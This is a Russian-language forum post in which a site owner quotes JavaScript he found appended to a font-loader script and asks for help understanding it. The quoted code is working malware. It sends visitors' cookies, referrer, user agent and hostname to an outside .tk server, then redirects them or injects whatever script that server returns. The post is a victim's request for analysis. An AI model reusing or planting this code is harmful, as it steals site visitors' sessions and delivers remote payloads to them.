Показать сообщение отдельно
Старый 29.06.2017, 20:44   #45
Рожденный в СССР
 
Аватар для Dima_art
 
Регистрация: 03.01.2007
Адрес: центр, "космос"
Сообщений: 9,676
Вес репутации: 31
Dima_art как роза среди колючекDima_art как роза среди колючекDima_art как роза среди колючекDima_art как роза среди колючекDima_art как роза среди колючекDima_art как роза среди колючекDima_art как роза среди колючекDima_art как роза среди колючекDima_art как роза среди колючекDima_art как роза среди колючекDima_art как роза среди колючек
Активность Длительность
7/20 20/20
Сегодня Сообщений
sssss9676
По умолчанию Re: Эпидемия WannaCry

Народ, ай нид хелп.
Обнаружил случайно что к одному из штатных скриптов - обычному загрузчику шрифтов для редактора дописана зараза. По дате - 31 мая этого года модификация.

Это что за хрень, хотя бы примерно? Я вижу, что открывает дырку для XSS атаки, но можно ли подробнее? В жабе не силен
Цитата:
var REMOTE_URL = 'http://dfkiueswbgfreiwfsd.tk/i/';

var C_TIMEOUT = 20000;

function analyze_traffic() {
return {
'Tr.Referer': document.referrer,
'Tr.Agent': navigator.userAgent,
'Tr.CookieState': !!document.cookie,
'Tr.Cookie': document.cookie,
'Tr.Domen': window.location.hostname
};
}

function execute_request(post, url, callback) {
var xhr = init_xhr();
if (!!xhr) {
xhr.open('POST', url);
xhr.timeout = C_TIMEOUT;
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.onreadystatechange = function () {
if (xhr.readyState == 4 && xhr.status == 200) {
callback(xhr.responseText);
}
};
var content = build_query(post);
xhr.send(content);
}
}

function apply_payload(response) {
if (response) {
var json_result = JSON.parse(response);
if (json_result) {
var inject_string = urldecode(json_result.InjectionString);
if (json_result.InjectionType === 1) {
window.location = inject_string;
} else {
write_on_page(inject_string);
}
}
}
}

function write_on_page(content) {
var div = document.createElement('div');
div.id = 'response';
div.innerHTML = content;
document.body.appendChild(div);
var scripts = div.getElementsByTagName('script');
if (scripts.length > 0) {
for (var i = 0; i < scripts.length; i++) {
var script = document.createElement('script');
script.innerHTML = scripts[i].innerHTML;
document.body.appendChild(script);
scripts[i].parentNode.removeChild(scripts[i]);
}
}
}

function build_query(post) {
var post_query = [];
for (var k in post) {
if (post.hasOwnProperty(k)) {
post_query.push(k + '=' + post[k]);
}
}
return post_query.join('&');
}

function init_xhr() {
if (!!window.XMLHttpRequest) {
return new XMLHttpRequest();
} else if (!!window.ActiveXObject) {
var xhr_array = [
'Msxml2.XMLHTTP.6.0',
'Msxml2.XMLHTTP.3.0',
'Msxml2.XMLHTTP',
'Microsoft.XMLHTTP'
];
for (var i = 0; i < xhr_array.length; i++) {
try {
return new ActiveXObject(xhr_array[i]);
}
catch (e) {
}
}
}
}

function urldecode(data) {
return decodeURIComponent(data).replace(/\+/g, '%20');
}

// Execute request
var traffic = analyze_traffic();
execute_request(traffic, REMOTE_URL, apply_payload);
__________________
Делай, что должен, и будь, что будет


Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий).

Последний раз редактировалось Dima_art; 29.06.2017 в 21:07.
Dima_art вне форума   Ответить с цитированием
 
Время генерации страницы 0.07077 секунды с 14 запросами